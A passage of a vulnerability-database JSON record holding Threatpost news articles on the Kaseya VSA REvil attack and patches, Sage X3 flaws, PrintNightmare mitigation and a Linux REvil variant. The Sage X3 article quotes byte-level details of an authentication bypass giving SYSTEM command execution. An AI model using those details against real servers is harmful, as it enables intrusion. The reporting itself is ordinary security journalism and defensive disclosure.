"epss": "0.491150000", "percentile": "0.968830000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30117", "epss": "0.000870000", "percentile": "0.351760000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30118", "epss": "0.003310000", "percentile": "0.664800000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30201", "epss": "0.001060000", "percentile": "0.414230000", "modified": "2023-03-17"}, {"cve": "CVE-2020-7390", "epss": "0.000580000", "percentile": "0.224540000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30119", "epss": "0.000620000", "percentile": "0.242030000", "modified": "2023-03-17"}, {"cve": "CVE-2020-7387", "epss": "0.000870000", "percentile": "0.350070000", "modified": "2023-03-17"}, {"cve": "CVE-2020-7389", "epss": "0.002860000", "percentile": "0.638350000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34527", "epss": "0.970380000", "percentile": "0.995570000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30116", "epss": "0.935460000", "percentile": "0.985370000", "modified": "2023-03-17"}, {"cve": "CVE-2015-2862", "epss": "0.001640000", "percentile": "0.513510000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30121", "epss": "0.001030000", "percentile": "0.404900000", "modified": "2023-03-17"}, {"cve": "CVE-2021-30120", "epss": "0.000960000", "percentile": "0.387200000", "modified": "2023-03-17"}], "vulnersScore": 1.1}, "_state": {"dependencies": 1660004461, "score": 1698828056, "epss": 1679098904}, "_internal": {"score_hash": "fc76473349324636faa0e556e08d6dd8"}}

{"threatpost": [{"lastseen": "2021-07-13T12:49:34", "description": "Kaseya made good on its promise to issue patches by July 11.\n\nOn Saturday, the company behind the Virtual System/Server Administrator (VSA) platform that got walloped by the REvil ransomware-as-a-service (RaaS) gang in a massive supply-chain attack released urgent updates to address critical zero-day security vulnerabilities in VSA.\n\nKaseya [released the VSA 9.5.7a (9.5.7.2994) update](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) to fix three zero-day vulnerabilities used in the ransomware attacks.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe company said on its [rolling advisory page](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) that all of its software-as-a-service (SaaS) customers were back up as of this morning, while the company was still working to restore on-premises customers that needed help:\n\n> The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. \u2014Kaseya\n\n## A Brazen Ransomware Blitz\n\nOn July 2, the [REvil gang wrenched open](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) those three VSA zero-days in [more than 5,000 attacks](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>). As of July 5, the worldwide assault had been unleashed in 22 countries, reaching not only Kaseya\u2019s managed service provider (MSP) customer base but also, given that many of them use VSA to manage the networks of other businesses, clawing at those MSP\u2019s customers.\n\nKaseya customers use VSA to remotely monitor and manage software and network infrastructure. It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nFollowing the brazen ransomware attacks, CISA and FBI last week [offered guidance](<https://threatpost.com/kaseya-attack-fallout/167541/>) to victims. Threat actors were quick to exploit the situation, having planted Cobalt Strike backdoors by malspamming a [bogus Microsoft update](<https://threatpost.com/fake-kaseya-vsa-update-cobalt-strike/167587/>) along with a malicious \u201cSecurityUpdates\u201d executable.\n\nAs of July 6, Kaseya said in its [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>) that there were fewer than 60 customers affected but far more \u2013 \u201cfewer than 1,500,\u201d it said \u2013 downstream businesses that got hit.\n\n## Kaseya Dismissed Workers\u2019 Cybersec Warnings\n\nKaseya already knew about these bugs when the attacks were launched. In April, the Dutch Institute for Vulnerability Disclosure (DIVD) had disclosed seven vulnerabilities to Kaseya.\n\nOn Saturday, [Bloomberg](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>) reported that software engineering and development employees at Kaseya\u2019s U.S. offices had brought up a laundry list of \u201cwide-ranging cybersecurity concerns\u201d to company leaders multiple times over the course of three years, from 2017 to 2020. When the outlet asked Kaseya to address the anonymous workers\u2019 accusations, a Kaseya spokesperson declined, citing a policy of not commenting on matters involving personnel or the ongoing criminal investigation into the hack.\n\nUPDATE 1: Dana Liedholm, senior vice president of corporate marketing for Kaseya, told Threatpost on Monday that the company has bigger fish to fry than responding to \u201crandom speculation\u201d: \u201cKaseya\u2019s focus is on the customers who have been affected and the people who have actual data and are trying to get to the bottom of it, not on random speculation by former employees or the wider world,\u201d Liedholm said via email.\n\nUPDATE 2: Jake Williams, co-founder and CTO at incident response firm BreachQuest, told Threatpost that dismissing workers\u2019 input as being \u201cspeculation\u201d doesn\u2019t make the accusations less credible. \u201cAfter a quick analysis of the VSA server product, it\u2019s pretty easy to believe these claims,\u201d he said via email. \u201cUntil management at software development firms begin prioritizing security fixes over feature updates, we can expect incidents like this to continue. The fact that Kaseya downplayed the reported 40-page security memo as \u2018speculation\u2019, without denying its existence, is a huge red flag and lends a lot of credence to the claims.\u201d\n\nUPDATE 3: Granted, managing security is tough for any company, including software vendors, noted Dirk Schrader, global vice president of security research at New Net Technologies (NNT). That doesn\u2019t let them off the hook, though, he told Threatpost on Monday. \u201cA company can\u2019t decline doing the essentials, because that is equivalent to being negligent on the risks related to cybersecurity, and there is plenty of material about what is essential.\u201d\n\nQuick searches point to areas in Kaseya\u2019s security that could be improved, Schrader added, such as outdated certificates on networking devices and on Kaseya\u2019s own instances of VSA. \u201cIt comes down to its security operations, its processes and whether they are up to par with the current threat landscape,\u201d Schrader said.\n\nTo support his statement, Schrader pointed to Cisco IOS device(s) [with an outdated cert](<http://\$https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\$>) used by Kaseya itself, noting that there are a couple of IPs showing the same issue. He found multiple additional certificate issues, including [this one ](<http://\$https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88\$>)and [this one](<https://whois.arin.net/rest/net/NET-23-31-43-48-1/pft?s=23.31.43.59>).\n\n## A Baker\u2019s Half-Dozen of Bugs\n\nMost of the seven vulnerabilities reported to Kaseya by DVID were patched on Kaseya\u2019s VSA SaaS service, but up until Saturday, three outstanding security holes on the VSA on-premise version still needed to be battened down. The attackers had snuck into that gap before Kaseya had a chance to bolster its on-premise VSA servers.\n\nThe three on-premise VSA bugs that Kaseya has now stomped:\n\n * [CVE-2021-30116](<https://csirt.divd.nl/cves/CVE-2021-30116>) \u2013 A credentials leak and business logic flaw, included in [version 9.5.7](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) rolled out on Saturday.\n * [CVE-2021-30119](<https://csirt.divd.nl/cves/CVE-2021-30119>) \u2013 A cross-site scripting (CSS) vulnerability, included in version 9.5.7.\n * [CVE-2021-30120](<https://csirt.divd.nl/cves/CVE-2021-30120>) \u2013 A bypass of two-factor authentication (2FA), included in version 9.5.7.\n\nFollowing the July 2 onslaught, Kaseya urged on-premise VSA customers to shut down their servers until the patch was ready. To punch up security still more, Kaseya is also [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417>) limiting network access to the VSA Application/GUI to local IP addresses only, \u201cby blocking all inbound traffic except for port 5721 (the agent port). Administrators will only be able to access the application from the local network or by using a VPN to connect to the local network.\u201d\n\n## Older Bugs\n\nBesides the outstanding trio of bugs Kaseya addressed on Sunday, these are the other four vulnerabilities that DIVD disclosed and which Kaseya already fixed before the July 2 attacks:\n\n * [CVE-2021-30117](<https://csirt.divd.nl/cves/CVE-2021-30117>) \u2013 An SQL injection vulnerability, resolved in a May 8 patch.\n * [CVE-2021-30118](<https://csirt.divd.nl/cves/CVE-2021-30118>) \u2013 A remote code execution (RCE) vulnerability, resolved in an April 10 patch. (v9.5.6)\n * [CVE-2021-30121](<https://csirt.divd.nl/cves/CVE-2021-30121>) \u2013 A [local file inclusion (LFI) vulnerability](<https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion>), resolved in the May 8 patch.\n * [CVE-2021-30201](<https://csirt.divd.nl/cves/CVE-2021-30201>) \u2013 An [XML external entity (XXE) vulnerability](<https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\$XXE\$_Processing>), resolved in the May 8 patch.\n\n071221 11:58 UPDATE: Added commentary from Dana Liedholm.\n\n071221 12:13 UPDATE: Added commentary from Jake Williams.\n\n071221 12:32 UPDATE: Added commentary from Dirk Schrader.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-12T15:53:42", "type": "threatpost", "title": "Kaseya Patches Zero-Days Used in REvil Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T15:53:42", "id": "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F", "href": "https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-07T18:38:04", "description": "Four vulnerabilities afflict the popular Sage X3 enterprise resource planning (ERP) platform, researchers found \u2013 including one critical bug that rates 10 out of 10 on the CVSS vulnerability-severity scale. Two of the bugs could be chained together to allow complete system takeovers, with potential supply-chain ramifications, they said.\n\nSage X3 is targeted at mid-sized companies \u2013 particularly manufacturers and distributors \u2013 that are looking for all-in-one ERP functionality. The system manages sales, finance, inventory, purchasing, customer-relationship management and manufacturing in one integrated ERP software solution.\n\nRapid7 researchers Jonathan Peterson, Aaron Herndon, Cale Black, Ryan Villarreal and William Vu, who discovered the issues (CVE-2020-7387 through -7390), said that the most severe of the flaws exist in the remote administrator function of the platform. As such, they said that there could be supply-chain ramifications to a successful attack ([a la Kaseya](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>)) if the platform is being used by managed service providers to deliver functionality to other businesses.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWhen combining CVE-2020-7387 and CVE-2020-7388, an attacker can first learn the installation path of the affected software, then use that information to pass commands to the host system to be run in the SYSTEM context,\u201d the researchers said in a [Wednesday posting](<https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/>). \u201cThis can allow an attacker to run arbitrary operating system commands to create Administrator level users, install malicious software and otherwise take complete control of the system for any purpose.\u201d\n\n## **Critical Authentication-Bypass Security Vulnerability**\n\nThe critical bug (CVE-2020-7388) allows unauthenticated remote command execution (RCE) with elevated privileges in the AdxDSrv.exe component, according to Rapid7. AdxAdmin is a function that\u2019s responsible for the remote administration of Sage X3 through the main console, researchers said \u2013 and an exploit could allow an adversary to execute commands on the server as the high-privileged \u201cNT AUTHORITY/SYSTEM\u201d user.\n\nThe administrative service is exposed on port TCP/1818 by default, under the process \u201cAdxDSrv.exe.\u201d The issue lies in the custom protocol that Sage X3 uses for interaction between the Sage X3 Console and AdxDSrv.exe, according to Rapid7.\n\nThe Sage X3 Console crafts a request to authenticate using a byte sequence that includes a password that\u2019s been encrypted using a custom mechanism. In response, the AdxDSrv.exe sends four bytes, indicating that authentication was successful.\n\n\u201cThese bytes are always prefixed with \\x00\\x00 and then two apparently random bytes, like so: \u2018\\x00\\x00\\x08\\x14,'\u201d researchers said.\n\nAfter receiving a response that the authentication was successful, it\u2019s then possible to execute remote commands, according to the advisory.\n\n\u201cFirst, the temporary directory is specified by the client with the name of the cmd file to be written to the server,\u201d researchers explained. \u201cThe batch file, with the provided cmd file name, is written to disk with the \u2018whoami\u2019 command in it. After the AdxDSrv.exe service writes the temporary batch file to the named folder, it will execute it under the security context of the provided user credentials, via a Windows API call to CreateProcessAsUserAs.\u201d\n\nTo exploit the issue and bypass the authentication process, a malicious actor could craft a special request to the exposed service. The cyberattacker would need to sidestep two components involved in sending a command to execute, researchers said.\n\nFirst, the attackers must know the installation directory of the AdxAdmin service, so that they can specify the full path location to which to write the cmd file to be executed.\n\n\u201cObtaining the installation\u2019s directory can be done either with prior knowledge, educated guesswork, or via an unauthenticated, remote information disclosure vulnerability (CVE-2020-7387),\u201d researchers said. \u201cInstallation path names tend to be fairly predictable when it comes to most enterprise software\u2014nearly all users install to a default directory on one of a handful of drive letters.\u201d\n\nSecondly, the attackers must confound the authorization sequence that includes the encrypted password. This can be done using a series of packets that spoof the AdxDSrv.exe authentication and command protocol, but with one critical modification.\n\n\u201cAn attacker can simply swap one byte and cause the service to ignore provided user credentials, and instead execute under the current AdxDSrv.exe process security context, which runs as NT AUTHORITY\\SYSTEM,\u201d researchers explained \u201cA bit of fuzzing revealed that using \u20180x06\u2019 instead of \u20180x6a\u2019 during the start of the authorization sequence allows [the client] to opt out of authentication entirely. In this mode, the requested command is executed as SYSTEM instead of impersonating a provided user account.\u201d\n\nThe issue affects V9, V11 and V12 versions of the platform.\n\n## **Medium-Severity Bugs in Sage X3**\n\nThe other three issues are rated medium in severity:\n\n * CVE-2020-7387: Exposure of Sensitive Information to an Unauthorized Actor in AdxAdmin (CVSS rating 5.3, affects V9, V11 and V12 versions)\n * CVE-2020-7389: Missing Authentication for Critical Function in Developer Environment in Syracuse (CVSS rating of 5.5, affects V9, V11 and V12 versions)\n * CVE-2020-7390: Persistent Cross-Site Scripting (XSS) in Syracuse (CVSS rating of 4.6, affects V12 only). This issue was previously reported to the vendor by Vivek Srivastav from Cobalt Labs in January, according to Rapid7.\n\nAs mentioned, the bug tracked as CVE-2020-7387 allows attackers to uncover the pathname for the needed installation directory, for use in exploiting the critical RCE flaw.\n\n\u201cWhile fuzzing the authentication and command protocol used by AdxAdmin.exe as described in CVE-2020-7388, it was discovered that sending the first byte as \u20180x09\u2019 rather than \u20180x6a,\u2019 with three trailing null bytes, returned the installation directory without requiring any authentication,\u201d researchers explained.\n\nMeanwhile, CVE-2020-7389 is a system CHAINE variable script command-injection bug \u2013 but Sage said that it wouldn\u2019t be fixing the issue since the functionality where the bug lives should only be available in development environments, not in production environments.\n\n\u201cSome web application scripts that allowed the use of the \u2018System\u2019 function could be paired with the \u2018CHAINE\u2019 variable in order to execute arbitrary commands, including those sourced from a remote SMB share,\u201d according to the analysis. \u201cThe page can be reached via the menu prompts Development -> Script dictionary -> Scripts.\u201d\n\nAnd finally, the CVE-2020-7390 vulnerability is a [stored XSS bug](<https://threatpost.com/unpatched-linux-marketplace-bugs-rce/167155/>). Stored XSS, also known as persistent XSS, occurs when a malicious script is injected directly into a vulnerable web application. Unlike reflected XSS, a stored attack only requires that a victim visit a compromised web page. In this case, the issue exists on the \u201cEdit\u201d page for user profiles, with the fields for first name, last name and email fields vulnerable to a stored XSS sequence, researchers said.\n\nA successful exploit could allow a regular user of Sage X3 to execute privileged functions as a currently logged-in administrator or to capture administrator session cookies for later impersonation as a currently logged-in administrator, according to Rapid7.\n\n\u201c[The bug] can only be triggered by an authenticated user, and requires user interaction [convincing the authenticated person to visit the correct webpage] in order to complete the attack,\u201d researchers explained.\n\n## **Patching Information for Sage ERP Security Vulnerabilities**\n\nThe three eligible vulnerabilities were fixed in recent releases for Sage X3 Version 9 (those components that ship with Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse v11.25.2.6), and Sage X3 Version 12 (Syracuse v12.10.2.8). Note: There was no commercially available Version 10 of Sage X3.\n\nIf updates cannot be applied immediately, customers have other options for remediation, according to Rapid7:\n\n * _For CVE-2020-7388 and CVE-2020-7387, do not expose the AdxDSrv.exe TCP port on any host running Sage X3 to the internet or other untrusted networks. As a further preventative measure, the AdxAdmin service should be stopped entirely while in production._\n * _For CVE-2020-7389 users should not expose this webapp interface to the internet or other untrusted networks. Furthermore, users of Sage X3 should ensure that development functionality is not available in production environments. For more information on ensuring this, please refer to the vendor\u2019s best practices documentation._\n * _In the event that network segmentation is inconvenient due to business-critical functions, only users trusted with system administration of the machines that host Sage X3 should be granted login access to the web application._\n\n\u201cGenerally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required,\u201d according to the analysis. \u201cFollowing this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-07T18:34:24", "type": "threatpost", "title": "Critical Sage X3 RCE Bug Allows Full System Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388", "CVE-2020-7389", "CVE-2020-7390"], "modified": "2021-07-07T18:34:24", "id": "THREATPOST:B3B543942E69CA8867497B6F2638F91F", "href": "https://threatpost.com/critical-sage-x3-rce-bug-allows-full-system-takeovers/167612/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-06T21:23:56", "description": "The U.S. government has stepped in to offer a mitigation for a critical remote code execution (RCE) vulnerability in the Windows Print Spooler service that may not have been fully patched by Microsoft\u2019s initial effort to fix it.\n\nTo mitigate the bug, [dubbed PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>), the CERT Coordination Center (CERT/CC) has released a [VulNote](<https://www.kb.cert.org/vuls/id/383432>) for CVE-2021-1675 urging system administrations to disable the Windows Print Spooler service in Domain Controllers and systems that do not print, the Cybersecurity Infratructure and Security Administration (CISA) said [in a release](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) Thursday. CERT/CC is part of the Software Engineering Institute, a federally funded research center operated by Carnegie Mellon University.\n\n\u201cWhile Microsoft has released an [update for CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), it is important to realize that this update does NOT protect Active Directory domain controllers, or systems that have [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>) configured with the NoWarningNoElevationOnInstall option configured,\u201d CERT/CC researchers wrote in the note.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe mitigation is in response to a scenario that unfolded earlier this week when a proof-of-concept (POC) for PrintNightmare was dropped on GitHub on Tuesday. While it was taken back down within a few hours, the code was copied and remains in circulation on the platform. An attacker can use the POC to exploit the vulnerability to take control of an affected system.\n\nIn the meantime, Microsoft Thursday put out a new advisory of its own on PrintNightmare that assigns a new CVE and seems to suggest a new attack vector while attempting to clarify confusion that has arisen over it.\n\nWhile the company originally addressed CVE-2021-1675 in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) as a minor elevation-of-privilege vulnerability, the listing was updated last week after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE.\n\nHowever, soon after it became clear to many experts that the patch appears to fail against the RCE aspect of the bug\u2014hence CISA\u2019s offer of another mitigation and Microsoft\u2019s update.\n\n## **Assignment of New CVE?**\n\nRegarding the latter, the company dropped [a notice](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) Thursday for a bug called \u201cWindows Print Spooler Remote Code Execution Vulnerability\u201d that appears to be the same vulnerability, but with a different CVE number\u2014in this case, CVE-2021-34527.\n\nThe description of the bug sounds like PrintNightmare; indeed, Microsoft acknowledges that it is \u201can evolving situation.\n\n\u201cA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d according to the notice. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn a \u201cFAQ\u201d section in the security update, Microsoft attempts to explain CVE-2021-34527\u2019s connection to CVE-2021-1675.\n\n\u201cIs this the vulnerability that has been referred to publicly as PrintNightmare? Yes, Microsoft has assigned CVE-2021-34527 to this vulnerability,\u201d the company wrote.\n\nHowever, the answer to the question \u201cIs this vulnerability related to CVE-2021-1675?\u201d suggests that CVE-2021-34527 is a different issue.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote. \u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nMicrosoft goes on to explain that CVE-2021-34527 existed before the June Patch Tuesday updates and that it affects domain controllers in \u201call versions of Windows.\u201d\n\n**\u201c**We are still investigating whether all versions are exploitable,\u201d the company wrote. \u201cWe will update this CVE when that information is evident.\u201d\n\nMicrosoft did not assign a score to CVE-2021-34527, citing its ongoing investigation.\n\n## **Two Vulnerabilities?**\n\nIn retrospect, one security researcher noted to Threatpost when news of PrintNightmare surfaced Tuesday that it was \u201ccurious\u201d that the CVE for the original vulnerability was \u201c-1675,\u201d observing that \u201cmost of the CVEs Microsoft patched in June are -31000 and higher.\u201d\n\n\u201cThis could be an indicator that they have known about this bug for some time, and fully addressing it is not trivial,\u201d Dustin Childs of Trend Micro\u2019s Zero Day Initiative told Threatpost at the time.\n\nNow it appears that perhaps Microsoft was patching only part of a more complex vulnerability. The likely scenario appears to be that there are two bugs in Windows Print Spooler that could offer attackers some kind of exploit chain or be used separately to take over systems.\n\nWhile one flaw may indeed have been addressed in June\u2019s Patch Tuesday update, the other could be mitigated by CERT/CC\u2019s workaround\u2014or could remain to be patched by a future Microsoft update that comes after the company completes its investigation.\n\nThe company\u2019s release Thursday of a new CVE related to PrintNightmare seems to be an initial attempt to clarify the situation, though given its developing nature, it remains a bit hazy for now.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-02T12:21:02", "type": "threatpost", "title": "CISA Offers New Mitigation for PrintNightmare Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-07-02T12:21:02", "id": "THREATPOST:933913B1D9B9CF84D33FECFC77C2FDC8", "href": "https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-06T21:35:58", "description": "UPDATE\n\nCybercriminals behind a string of high-profile ransomware attacks, including [one extorting $11 million from JBS Foods](<https://threatpost.com/jbs-paid-11m/166767/>) last month, have ported their malware code to the Linux operating system. The unusual move is an attempt to target VMware\u2019s ESXi virtual machine management software and network attached storage (NAS) devices that run on the Linux operating system (OS).\n\nResearchers at AT&T Cybersecurity said they have confirmed four Linux samples of the REvil malware in the wild.\n\nOfer Caspi, security researcher at Alien Labs, a division of AT&T Cybersecurity, wrote[ in a Thursday blog](<https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version>) that after receiving a tip from [MalwareHuntingTeam](<https://twitter.com/malwrhunterteam/status/1409577829289934851?s=20>) it identified the four samples.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cREvil ransomware authors have expanded their arsenal to include Linux ransomware, which allows them to target ESXi and NAS devices,\u201d Caspi wrote.\n\nIn a nod to research by [AdvIntel](<https://twitter.com/y_advintel/status/1391450354051653633>) in early May 2021, which reported REvil\u2019s intent to port its Windows-based ransomware to Linux, Caspi confirmed the Linux variant was spotted in May \u201caffecting *nix systems and ESXi.\u201d\n\n\u201cThe samples are ELF-64 executables, with similarities to the Windows REvil executable, being the most noticeable among the configuration options,\u201d he wrote.\n\nExecutable and Linkable Format (or ELF-64) is a standard file format for executable files within Linux and UNIX-like operating systems, [according to a technical breakdown](<https://0xax.gitbooks.io/linux-insides/content/Theory/linux-theory-2.html>).\n\n## **Linux Ransomware: Rare, but Real **\n\nWhat makes Alien Labs\u2019 discovery of the Linux REvil variant unique is that the Linux, Unix and other Unix-like computer operating systems, are not typically targeted by adversaries. Microsoft Windows computer systems generally deliver the biggest return for an attacker\u2019s effort because of the ubiquity of the OS. Furthermore, instances of Linux are generally well-protected against vulnerabilities, thanks to a tightknit user-base delivering fast security updates.\n\nPast examples of Linux malware over the past several years have included Tycoon, Lilocked (or Lilu) and [QNAPCrypt](<https://threatpost.com/qnap-flaws-plague-nas-systems/161924/>). In November, Kaspersky identified a Linux sample of RansomEXX. Researchers noted that criminals based its Linux variant on \u201cWinAPI (functions specific to Windows OS)\u201d and used a similar mechanism to manipulate targeted Linux MBED TLS libraries.\n\nMBED TLS is an implementation of the TLS and SSL protocols distributed under the Apache License.\n\n\u201cThe Apache license itself has nothing to do with web servers, other than it being one of the more widely used pieces of software that uses the license, among hundreds of thousands of other open source projects,\u201d said Kenneth White, director of the Open Crypto Audit Project.\n\nIn May, researchers noted criminals behind the [DarkSide ransomware also released a Linux variant](<https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html>). Attackers also targeted, \u201cvirtual machine-related files on VMware ESXI servers.\u201d Researchers said the malware \u201cparses its embedded configuration, kills virtual machines, encrypts files on the infected machine, collects system information, and sends it to the remote server.\u201d\n\n## **Targeted Attacks: Linux in the Crosshairs **\n\nVMware ESXi, formerly known as ESX, is a bare metal hypervisor that installs easily on to your server and partitions it into multiple virtual machines (VM).\n\n\u201cThe hypervisor ESXi allows multiple virtual machines to share the same hard drive storage. However, this also enables attackers to encrypt the centralized virtual hard drives used to store data from across VMs, potentially causing disruptions to companies,\u201d Alien Labs reported. \u201c[I]n addition to targeting ESXi, REvil is also targeting NAS devices as another storage platform with the potential to highly impact the affected companies.\u201d\n\nResearchers said the Linux version of REvil share similar attributes to the Windows OS variant. \u201cThe [executable\u2019s] configuration file format is very similar to the one observed for REvil Windows samples, but with fewer fields,\u201d Caspi wrote.\n\nSimilarities also include:\n\n * Base64-encoded value containing the attacker\u2019s public key used to encrypt files.\n * Ransomware-as-a-service (RaaS) affiliate identifier (7987) is shared between both operating systems.\n * The ransom note\u2019s body content is encoded in base64.\n * The encrypted extensions, which appears to be five random character, both are: .rhkrc, .qoxaq, .naixq, and . 7rspj.\n\n\u201cThe threat actors behind REvil RaaS have rapidly developed a Linux version to compete against the recently released Linux version of DarkSide. It is hard to clarify if these two RaaS are competing against each other or collaborating team members, as stated by other security researchers,\u201d researchers wrote.\n\n_**(This article was updated 7/6 at 12:40 p.m. ET to reflect a clarification on the nature of the Apache software license in the context of MBED TLS.)**_\n\n**Check out our free **[**upcoming live and on-demand webinar events**](<https://threatpost.com/category/webinars/>)** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**\n", "cvss3": {}, "published": "2021-07-01T20:56:15", "type": "threatpost", "title": "Linux Variant of REvil Ransomware Targets VMware\u2019s ESXi, NAS Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-01T20:56:15", "id": "THREATPOST:CA70B877BD3855C30DBA388CA828583A", "href": "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-07T18:25:01", "description": "UPDATE 2\n\nThe worldwide July 2 attacks on the Kaseya Virtual System/Server Administrator (VSA) platform by the REvil ransomware gang turn out to be the result of exploits for at least one zero-day security vulnerability, and the company is swinging into full mitigation mode, with patches for the on-premise version coming sometime this week, it said.\n\nThe VSA software is used by Kaseya customers to remotely monitor and manage software and network infrastructure. It\u2019s supplied either as a hosted cloud service by Kaseya, or via on-premises VSA servers.\n\nThe attacks on the VSA (details on the multiple zero-day bugs believed used are below) are now estimated to have led to the encryption of files for around 60 Kaseya customers using the on-premises version of the platform \u2013 many of which are managed service providers (MSPs) who use VSA to manage the networks of other businesses.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThat MSP connection allowed REvil access to those customers-of-customers, and there are around 1,500 downstream businesses now affected, Kaseya said in an [updated rolling advisory](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>). It\u2019s estimated that more than a million individual systems are locked up, and Kaspersky [on Monday said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) that it had seen more than 5,000 attack attempts in 22 countries at that point.\n\n\u201cThe VSA server is used to manage large fleets of computers, and is normally used by MSPs to manage all their clients,\u201d explained researchers at TruSec, [in a post](<https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>) on Sunday. \u201cWithout separation between client environments, this creates a dependency: If the VSA server is compromised, all client environments managed from this server can be compromised too.\u201d\n\nIt added, \u201cAdditionally, if the VSA server is exposed to internet, any potential vulnerability could be leveraged over the internet to breach the server. This is what happened in this case. The threat actor, an affiliate of the REvil ransomware-as-a-service, identified and exploited a zero-day vulnerability in the VSA server. The vulnerability was exploited to introduce a malicious script to be sent to all computers managed by the server, therefore reaching all the end clients. The script delivered the REvil ransomware and encrypted the systems.\u201d\n\nThus, while customers wait for patches, \u201cAll on-premises VSA servers should continue to remain offline until further instructions from Kaseya about when it is safe to restore 